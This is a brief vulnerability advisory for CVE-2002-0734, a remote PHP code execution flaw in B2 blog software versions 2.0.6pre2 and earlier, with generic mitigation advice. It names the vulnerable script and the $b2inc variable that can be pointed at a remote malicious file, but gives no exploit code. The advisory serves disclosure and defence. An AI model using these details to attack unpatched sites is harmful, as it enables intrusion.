CVE-2002-0734

Name of the Vulnerable Software and Affected Versions B2 versions 2.0.6pre2 and earlier

Description The issue arises from the improper loading of the b2config.php file in certain configurations by the b2edit.showposts.php script. This allows remote attackers to execute arbitrary PHP code by manipulating the $b2inc variable to point to a malicious program stored on a remote server.

Recommendations For B2 versions 2.0.6pre2 and earlier, ensure the b2config.php file is properly loaded and secured to prevent remote attackers from manipulating the $b2inc variable. Consider restricting access to the b2edit.showposts.php script until a proper fix is applied. At the moment, there is no information about a newer version that contains a fix for this vulnerability.